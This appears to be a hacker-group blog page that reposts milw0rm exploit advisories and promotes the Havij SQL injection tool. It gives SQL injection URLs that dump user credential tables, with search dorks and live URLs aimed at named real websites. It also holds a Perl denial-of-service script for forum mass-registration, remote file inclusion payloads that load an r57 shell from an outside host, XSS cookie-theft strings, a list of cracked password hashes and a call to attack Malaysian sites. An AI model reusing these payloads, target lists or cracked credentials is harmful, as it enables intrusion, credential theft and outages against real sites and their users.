Havij v1.13 Advanced SQL Injection

Description:

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.

The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.

The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.


What's New?

* Oracle error based database added with ability to execute query.
* Getting tables and column when database name is unknown added (mysql)
* Another method added for finding columns count and string column in PostgreSQL
* Automatic keyword finder optimized and some bugs fixed.
* A bug in finding valid string column in mysql fixed.
* 'Key is not unique' bug fixed
* Getting data starts from row 2 when All in One fails - bug fixed
* Run time error when finding keyword fixed.
* False table finding in access fixed.
* keyword correction method made better
* A bug in getting current data base in mssql fixed.
* A secondary method added when input value doesn't return a normal page (usually 404 not found)
* Data extraction bug in html-encoded pages fixed.
* String or integer type detection made better.
* A bug in https injection fixed.

How to use

This tool is for exploiting SQL Injection bugs in web application.

For using this tool you should know a little about SQL Injections.

Enter target url and select http method then click Analyze.

Note: Try to url be valid input that returns a normal page not a 404 or error page.



Licence

The free version of Havij is free software. We hope it be useful for you.
This software is provided "as is" without warranties.
Feel free to share and distribute it anywhere but please keep the files original!

There is a commerical version of Havij that is not free.
To purchase Pro version of Havij please visit Here


Disclaimer

We are NOT responsible for any damage or illegal actions caused by the use of this program. Use on your own risk!

Follow the link below to download Havij 1.13 free version:

Havij v1.13 Free (MD5 checksum: 276a84bda58a9def55eef35bf2838a77)


#indonesiancoder.com

Read more »

Posted in: Hacking,Havij,Tools,Tutorial

Mambo Component com_hestar Remote SQL Injection Vulnerability

## com_hestar 1.0.0 ##
## Author : M3NW5 (M3NW5[at]hackermail[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : Monday, Semptember 07,2009 ##


[ Software Information ]

[+] Software : com_hestar
[+] Version : 1.0.0
[+] Provider : Netvistun - netvistun@netvistun.is
[+] Web Provider : www.netvistun.is
[+] Vulnerability : SQL injection
[+] Google Dork : inurl:"com_hestar"

#####################################################
[ POC ]

http://127.0.0.1/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--


[ Demo ]

http://www.arbae.is/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--
#####################################################

[ Greetings ]

[+] All of Indonesian Coder Member, Don Tukulesto, mistersaint, gonzhack, m364tr0n, cyb3r_tr0n, TUCKER, Petrucii, Chercut,
Senot, Joker, Rebel, Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d
[+] All of Surabayahackerlink Member, Awan, Plaque, rey_cute, Tuex, XNITRO, DraCoola.com
[+] ServerIsDown.org, Jack-, Yadoy666, kecemplungkalen, xshadow, H4ck3rKu
[+] Kill-9 Crew, kaMtiEz, Arianom

[ SHOUT ]

STILL FVCKED TO MALAYSIA, TRULLY THIEF COUNTRY IN ASIA.
Let's Hack Malaysian site. PROUD TO BE INDONESIAN !!!!!

[ Special to ]

Anggie Lestari Putri sulung dari keluarga bapak dodi dan ibu dini ^^ i lope yu pull...

# milw0rm.com [2009-09-09]

Read more »

Posted in: Bugs,Hacking

Invision Power Board <= 2.1.4 (Register Users) Denial of Service Exploit

#!/usr/bin/perl
use IO::Socket;
##########################################################
## _______ _______ ______ #
## |______ |______ | \ #
## ______| |______ |_____/ #
## #
##IPB Register Multiple Users Denial of Service #
##Doesn't Work on forums using "Code Confirmation" #
##Created By SkOd #
##SED security Team #
##http://www.sed-team.be #
##skod.uk@gmail.com #
##ISRAEL #
##########################################################

print q{
############################################################
# Invision Power Board Multiple Users DOS #
# Tested on IPB 2.0.1 #
# created By SkOd. SED Security Team #
############################################################
};
$rand=rand(10);
print "Forum Host: ";
$serv = ;
chop ($serv);
print "Forum Path: ";
$path = ;
chop ($path);
for ($i=0; $i<9999; $i++)
{
$name="sedXPL_".$rand.$i;
$data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sedbotbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1&allow_member_mail=1&day=11&month=11&year=1985&agree=1";
$len = length $data;
$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed";
print $get1 "POST ".$path."index.php HTTP/1.0\n";
print $get1 "Host: ".$serv."\n";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$len."\n\n";
print $get1 $data;
syswrite STDOUT, "+";
}
print "Forum shuld be Dosed. Check it out...\n";

# milw0rm.com [2006-02-10]

Fear Nothing. Risk Everything.

WWW.INDONESIANCODER.COM

Read more »

Posted in: Hacking

CMS WEBjump! Multiple SQL Injection Vulnerabilities

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Powered by Content Management System WEBjump! SQL Injection Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Author : M3NW5
contach : M3NW5@hackermail.com
GreetZ : Anggie Barker,vhiia ^,^
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

--== Dork ==--
Powered by Content Management System WEBjump! "portfolio_genre.php?id="

Exploite : www.sute.com/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--

Live : http://www.leti.cz/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--

--== Dork ==--
Powered by Content Management System WEBjump! "news_id.php?lang="

Exploite : www.sute.com/path/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--

Live : http://tower.klif.pl/content/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-03-10]



VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Bugs,Hacking

Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability

Jogjacamp JProfile Gold SQL Injection

by kecemplungkalen

Vendor : http://jogjacamp.com

bugs : /index.php?action=news.detail&id_news=

exploit : union select concat(username,0x3a,password),2,3 from phpss_account--

POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

###############################################################

greetz : Allah
s3t4n and Paman aka Jack-
my family
and all Mainhack BrotherHood
jupe crew jangan ngegame melulu :p

# milw0rm.com [2009-03-03]


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Bugs,Hacking

Make a PHP info file

This tutorial will show you how to display Apache PHP configuration.
It is useful in cases when you are going to install a particular application which needs specific requirements like register_globals or long_array turned On or Off.

This can be done by simply uploading one file, for example 'info.php' with the following code included inside:

// Print all information.
phpinfo();

// Output only the module information.
phpinfo(INFO_MODULES);

?>

create one text file with your favorite text editor like Notepad, then copy and paste the code above into it. Save the file for example like info.php and then upload it to your server.
Then you are ready type : http://yourdomain.tld/info.php and you should see a table with the current PHP configuration and module information.




VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Hacking,Tutorial

SSH Explorer SSH Client

SSH Explorer is a new generation SSH/Telnet client and terminal emulator that makes remote Linux server administration look like much more fun than it actually is.
File View panel lets you navigate through and operate with remote directories and files as effortlessly as if they were on your home computer.

The integrated text editor will be a great tool for people who don't like the awkward vi and emacs interface.

SSH Explorer also includes a pack of useful Linux commands and allows you to create your own snippets so you don't have to remember and type them anymore. VT100 terminal emulation, SSH1, SSH2 and Telnet protocols are supported.

PCWIN[dot]COM

VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Hacking,Tutorial

[waraxe-2004-SA#031] Multiple vulnerabilities in e107 version 0.615

www.waraxe.us

Author: Janek Vind "waraxe"
Date: 29. May 2004
Location: Estonia
Tartu Web: http://www.waraxe.us/index.php?modname=sa&id=31

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From the official e107 Website - e107 is a portal / content management system powered by PHP and mySQL that gives you a totally dynamic and professional website out of the box.
It's simple wizard type install process will have you up and running in 5 minutes, and best of all it's completely free.

Homepage: http://e107.org/

Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
First of all, some conditions have to be met on victim server, to be vulnerable:

1. "register_globals" must be "on"
2. mysql must be version 4.x with enabled UNION functionality.

Now, let's discuss those security flaws:

A - Full Path Disclosure:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Many software developers, webmasters, admins and other IT staff are underestimating the full path disclosure as security bug.
Anyway, this information - full path to script - must be kept in secret, when possible, or it will be as little piece of the puzzle amongst many other pieces, which finally will lead to successful attack on the website.

A1 - many scripts can be accessed directly and this will provoke standard php error messages, which leads to full path disclosure.

Examples:
http://localhost/e107_0615/e107_plugins/alt_news/alt_news.php
http://localhost/e107_0615/e107_plugins/backend_menu/backend_menu.php
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php
http://localhost/e107_0615/e107_plugins/counter_menu/counter_menu.php
http://localhost/e107_0615/e107_plugins/login_menu/login_menu.php

... and many-many more, needed to be fixed!

B - Cross-site scripting aka XSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Potential attacker can use xss to steal the cookies, to read cross-domain forms,etc.
Finally it can lead to admin account compromise and ovetakeing of the website.

B1 - xss in clock_menu.php through direct access of the script:
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22); //--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

B2 - xss in feature called "email article to a friend":
attacker must be logged off and will enter to inputfield "logged name" this: foobar'>

B3 - xss in feature called "submit news":
Attacker is logged off and will enter to inputfield "logged name" this: foobar'>

B4 - xss in "user settings":
attacker is logged on and makes POST request like this: http://localhost/e107_0615/usersettings.php?avmsg=[xss code here]


C - Remote file inclusion:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Remote inclusion - this is VERY DANGEROUS security hole.
If php is configured with "allow_url_fopen=on" and there is no firewall, which blocks outbound connections, then potential attacker can force VICTIM's php engine to parse ATTACKER's php code!!
This can lead to shell-level server compromise (if there are permissions to execute system commands) with "nobody" or "apache" privileges.
Attacker can then try some local r00t exploits and finally server is 0wned ;)

C1 - remote file inclusion in "secure_img_render.php"
script: http://localhost/e107_0615/e107_handlers/secure_img_render.php?p=http://attacker.com/evil.php
Remark: "register_globals" must be "on" to be successful in exploitining in this way.

D - Sql injection
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Through sql injection potential attacker can gather from database any information he wants.
Including admin's username and password's md5 hash.
There are only 1...2 steps more to admin's account overtakeing...

D1 - critical sql injection bug #1 in "content.php" script:
http://localhost/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null,null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*

D2 - critical sql injection bug #2 in "content.php" script:
http://localhost/e107_0615/content.php?query=content_id=99%20UNION%20select%20null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/*

D3 - critical sql injection bug in "news.php" script:
http://localhost/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*

How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
First of all, i suggest to use newer version 0.616, which seems to be patched against above discussed bugs.
And of course, you are welcome to visit forum on my homepage at http://www.waraxe.us/forum/ , where you can find tutorial about manual fixes.

See ya there!

Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to Raido Kerna and to http://www.gamecheaters.us staff!
Special greets to icenix for helping me in bughunting!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it Janek Vind "waraxe"
Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------

VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Bugs,Hacking

md5 hash result

HASH          RESULT
f68d6257f3283c29a2ac0939ac45b46c tr1lat3ral
b7d25e14395822461c97d9c9708d5cfb dc6W1hp
92794b20b92309b2e1ca335e4f95783e 6anina96
38461e5b1f0ab939ddc0b5951f356e33 c8ommega
7547db6e86d2a55fe0ab85985e367c33 ddsusanne
e865001d2e32ed9190a7bbf0c58b8678 2bUfciu
244ea1588f1d141bfef687fbdb331b6e id0173
9d36d5aaa414cbb9ecbe561f959658b6 922798
15dfff3348f289ea0e73f5ddd4a0f7a4 rex9869
12a4e59f670a12aa15ac3a8120efb1a3 us2rj6
3914591c9add5435d26f8d4750f5c108 itvbxy
cc19c8b8b6c36bac097274b15fa32efe oloxolox
8332047cb4ceb1646c17f33a868a2912 1zorec3
30266e69e9d2cc380c6c98391055f4f1 28.3.1975
1bee9d8781669c55144e989f8640a4c9 16.7.1975
b0acddac857b0971e0e414c50126c4c7 25.3.1965
4956c1b0cd069d16d3e53132bf89fc50 20.4.1989
43215c787d1360e929a8f4fa71f0262a 26.5.1969
ab2b6064596287b38e414993c40adb8e 2.7.1998
67b2ec5ae4a6fcbba6ad4aa3d0fe6b38 14.5.1979
e183cd80ffa8985d6ea90951c07ed89f 31.2.2007
20aa3c8217acdb0f7392d15017005703 31.8.1996
ee6fc195c819ddabacacb1cb270565dd 1.10.1996
790815a513fc928d8f122f6759ad2471 8.8.1976
a86a800fedcce2797efe5ab312b11da0 4fAlfred
f2677dc73de10f9e829404811b606b3e 7.8.1997
756c063bad497e5ebbc27358dcc22368 31.3.2000
b0846765a7547f951751551beb425f81 9.1.1997
398d16ebe8f7c85ae10b9f13f591f117 20.1.1971
3b9074c5d4764e2f9e99873dff41190b 21.6.1962
a727504b5780251b4ac559ee43d71d60 10.12.1987
dae803fc51619d543ac665172d95e99a 4.11.1981
cd565fe4525b6ec0c975fe817b2e7a49 17.2.1993
59cf2689c66f57a1e333a01f249940f0 30.2.1989
da5ed6ab373acb09d069c08fe3a903f3 10.9.1979
66b0c732b717706989a0c295f3c82d94 17.8.1990

67a589e29e4a60739b00297d78a7d3b5 5.4.1999
9fa2da1c619f64282c79c274f9321961 27.1.1962
7e7a975ba91734e00aede4927aacab33 19.10.1970
9ea13a4518d7d84b658b1f5762ef0219 5.11.1964
b160bd149cafa2947a29f4af5de15e6c 29.1.1979
4a641765e29597d4e966d9b124f0aa81 11.11.1982
c83a40f2ab4f886a2833eb6e3769e5a9 16.7.1989
3b93a29543674dcfe2850f4b53f73740 31.9.1996
d61f5249cf5d524ea639d67c1930b77a 13.4.1987
445f860497276ea9acadd4ada1e68b4a 13.3.1974
ef006c2690e99e3a18295b918519cde5 13.5.1963
98d4cbb1fc44a709eaa2255e03dd8504 30.1.1981
c3987a6cac0da267fa89e876cd4085fc 14.1.1997
22b3a25f13f3270bd9e419412b537b8f 31.11.1960
99e459f4a5e73766c09ac24edefefaa8 31.4.1997
51a8c24da181b92a01dca6463fb67a0b 8.6.1993
e7f4bce621b39ad224f73c0069345605 9.11.1965
27cfd5d2257efb5f2ff5e3f920977179 7.3.1971
f23434be08d89eac9fe55e0031cb700a 27.3.1980
39ea926727607cc4bc3799f2532a88f9 6.9.1994
a7825a2ce6400b7e0bd6f89a7bbbb75a 9309111979
87c08a8c6e89d2c53d79e0bda5845c53 9.6.1969
9576de8b41e56ca29dd98eb3a768db04 4.10.1979
ab1148d68917b63edc13d18d9f6507a7 12.8.1965
47a0f4f11c0f11ef5b67dac4274a358c 12.7.1977
a3fed49d4891d6eedb1b606076ba3c02 18.1.1969
b21596c54e76fae81f212b0264e2dc80 28.4.1970
ac0746237ce2bfefdaa03f2b97bfecca 8.5.1967
66ef0fc1f7bfa11f7b1e69204182096c 16.4.1968
dc00c693265599622c6ea296cf37255f 1.2.1981
6b9a4cca7ff84b05a5506312f5c7887c 22.1.1974
76ece562eb760b95a968d9d5c463d7b0 16.8.1971
4e28168261b1890625bc86c9582bd62a 20.3.1994
940453ba77f85b5a6994f09d5c9471bf 14.5.1968
d01d80ae31a20d8274c51dfc92f2e2d4 19.11.1960
d7169ac45c16186e64146e2294c88dc4 4.5.1964
b4d4017c1e9b36468fc8be5542308143 6.8.1973
0cd0cb0206016b70e1cc9a42457df98c 18.9.1977
1202eff4c17f78c62350111aa4c1708a 24.1.1993
cb730d1ba27048f61baba069e09185a7 1.5.1998
0cb8e7261a455dd11058ac3d6222e84f 10.4.1974
8ac35668b0d9c684d3ec65a3ea80cfb8 20.3.1975
04087800e68f180e7fe3c061f63276d9 3.8.1986
f85d65551afc2b9c2f82d78277fd8949 3.3.1966
72ca91f6b5ef3d4dc834f09dd84e1c02 29.12.1964
61652ec897816a652e9c7b9eb1c5a190 7.6.1991
ac5c7d4c516af8bac32e1e4890825b8e 16.1.1971
f0196b5527141dd363588f3e6c398ede 28.3.1974
1700fbccb0d05127c56d10b6777a42a4 31.6.1996
4b315e1a66d7720a986ade950a2bd95e 8etreppe
b9d339c439317b33a46caf5662dabfd9 c5biberle
e366de0e4023b753e8a138b4d83ecaf3 29618541
72ae77fd94da32b8ff7c00a2beac942f tasso712
8479c86348afb645a141b3e437848365 tardmonkey
861e86fea1390ff87ed8cb1952a0753d kdkqm5
9d36d5aaa414cbb9ecbe561f959658b6 922798
1e9a309b18baeee7a85d58d21a3192c4 752477


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Hacking,md5

Joomla/Mambo Component SWmenuFree 4.0 RFI Vulnerability

######################################################
#
# MAMBO Modules SWmenu 4.0 (ImageManager.php) Remote File Include Vulnerabilities
#
######################################################
#
# script : http://mamboxchange.com/frs/download.php/8109/com_swmenufree4.0.zip
#
######################################################
#
# file : /ImageManager/Classes/ImageManager.php
#
######################################################
#
# Dork : index.php?option=com_swmenupro
#
######################################################
#
# Found by & Contact : Cold z3ro , Cold-z3ro@hotmail.com , http://hack-teach.com/ , Team Hell
#
######################################################
#
# require_once($mosConfig_absolute_path."/administrator/components/com_swmenupro/ImageManager/Classes/Files.php");
#
######################################################
#
# Exploit :
#
# Here one : http://www.example.com/MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=Evil-script?
#
# Or : http://www.example.com/MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=Evil-script?
#
######################################################


---- GreeTz: |MoHaNdKo| |Cold One| |Cold ThreE| |Viper Hacker| |The Wolf KSA| |o0xxdark0o| | Kof2002 | |OrGanza| |H@mLiT| |Snake12| |Root Shell|
|Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke| |Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|
|Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C| |Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|
| The Sniper | . ||| Team Hell ||| | DearMan | |Pro Hacker| | 020 | | abdulla00 " alz3eem" | | The_Viper |
All i know


#Big Thx For : www.4azhar.com , Viva My HomeLand Palestine

# milw0rm.com [2007-03-23]


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Bugs,Hacking

Joomla/Mambo Component Taskhopper 1.1 RFI Vulnerabilities

==================================================
Joomla/Mambo Component Taskhopper 1.1 (/inc/ mosConfig_absolute_path) RFI
==================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
==================================================
Homepage: www.Hack-Teach.com
==================================================
Script Site : http://taskhopper.com/One1
==================================================
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
==================================================



#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-10]

VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Bugs,Hacking

Mambo Component Quran <= 1.1 (surano) SQL Injection Vulnerability

+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
--found by breaker_unit and Don
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+

Qur'an component allows you to read and listen to the Qur'an (The Islamic Holybook) online. A great resource for Islamic sites running on Mambo Open Source. This component was originally developed for PHP-Nuke by Syed Rasel at http://www.nzmuslim.net and then modified/ported to PostNuke and Mambo Open Source by Kemas Yunus Antonius.

Key Features:

* Displaying the Qur'an in Arabic and its translations.
* Enhanced with search function (using any keywords or by chapter number and verse number).
* Arabic recitation for both listening and downloading.
* Very user friendly.
* Using mysql database instead of file text.

Available translations at the moment:

* English
* Indonesian

You can get them all at http://www.kyantonius.com.


+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
allinurl:"com_quran"
inurl:"/index.php?option=com_quran"
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
Mambo
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--

Joomla
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--

Greetz to:
balcan-crew.org
milw0rm.com
h4cky0u.biz

# milw0rm.com [2008-02-15]



VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Bugs,Hacking

YACS CMS 8.11 update_trailer.php Remote File Inclusion Vulnerability

-----------------[remote file include]-----------------

script: YACS version 8.11

------------------------------------------------------------------

download from: http://www.yetanothercommunitysystem.com/file-fetch/814-20081130-yacs-8.11rc30.zip


==============================================
vul: /yacs/scripts/update_trailer.php line 21 23 25;


include_once $context['path_to_root'].'shared/safe.php'; 21
if(!class_exists('i18n'))
include_once $context['path_to_root'].'i18n/i18n.php'; 23
if(!class_exists('SQL'))
include_once $context['path_to_root'].'shared/sql.php'; 25



==============================================

dork: "Powered by yacs"
----------------------------------------------

xpl:

http://127.0.0.1/path/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]

http://127.0.0.1/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]

***************************************************

---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]

from[iran]
---------------------------------------------------

# milw0rm.com [2009-02-16]


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Bugs,Hacking

Joomla and Mambo eWriting 1.2.1 Components - SQL injection

eWriting 1.2.1 - SQL injection

# Discovered by breaker_unit & Don
# BHack
# b4lc4n.org
# Gretz to h4cky0u.org l r00tsecurity.org l h4cky0u.biz l

Dorks:

"Powered by eWriting 1.2.1
allinurl:"com_ewriting"

Joomla!

/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--

Mambo

/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+mos_users--

+++++++++++++++++++++++++++++++++++++

# milw0rm.com [2008-03-10]


==============================================================
EXAMPLE FROM ME :

http://sexxxploration.com/cms/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--

VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Bugs,Hacking

Joomla - com_books SQL Injection

#################################################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[!] Module_Name: com_books
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"com_books"
#################################################################################

#[~] Example:

index.php?option=com_books&task=book_details&book_id=[exploit]

#[~]Exploit:
-9999+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users--


##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2008-11-11]



VIVA INDONESIAN CODER TEAM

Read more »

Posted in: Bugs,Hacking

dynaWeb - Remote File Include

#############################################################
# Application Name : dynaWeb
# Vulnerable Type : Remote File Include
# Infection : Site ve sunucuya erişim sağlanabilir.
# Bug Fix Advice : Undefined değerler tanımlanmalıdır.
# author : code Hunters TIM
# Script Download : sourceforge.net
#############################################################

< -- bug code start -- >

http://Site/Path/siteQuery.php?sitePath=[Shell]

< -- bug code end of -- >





VIVA INDONESIAN CODER TEAM
Get The Code and Fell The SOUL

Read more »

Posted in: Bugs,Hacking

phpxD - Remote File Include

#############################################################
# Application Name : phpxD
# Vulnerable Type : Remote File Include
# Infection : Site ve sunucuya erişim sağlanabilir.
# Bug Fix Advice : Undefined değerler tanımlanmalıdır.
# author : code Hunters TIM
# Script Download : sourceforge.net
#############################################################


Vuln Path :

http://Site/Path/include/parser.php?path=[Shell]
http://Site/Path/include/dtd.php?path=[Shell]
http://site/path/include/dom.php?path=[shell]





VIVA INDONESIAN CODER TEAM
Get The Code and Fell The SOUL

Read more »

Posted in: Bugs,Hacking

BBShop 4.5 Final - Multiple RFI

[o] BBShop 4.5 Final Multiple Remote File Inclusion Vulnerability
Software : BBShop version 4.5
Vendor : http://zzem.co.kr/
Developer : The Win
Author : NoGe

[o] Vulnerable file
bbshop/shop/index.php
bbshop/shop/main.php
bbshop/admin/admin.php
bbshop/admin/index.php
all this file is affected by _shop_path variable

[o] Exploit
http://localhost/[path]/bbshop/shop/index.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/shop/main.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/admin/admin.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/admin/index.php?_shop_path=[evilcode]

[o] Dork
"bbshop"

NoGe.ZoNe

VIVA INDONESIAN CODER TEAM
Get The Code and Fell The SOUL

Read more »

Posted in: Bugs,Hacking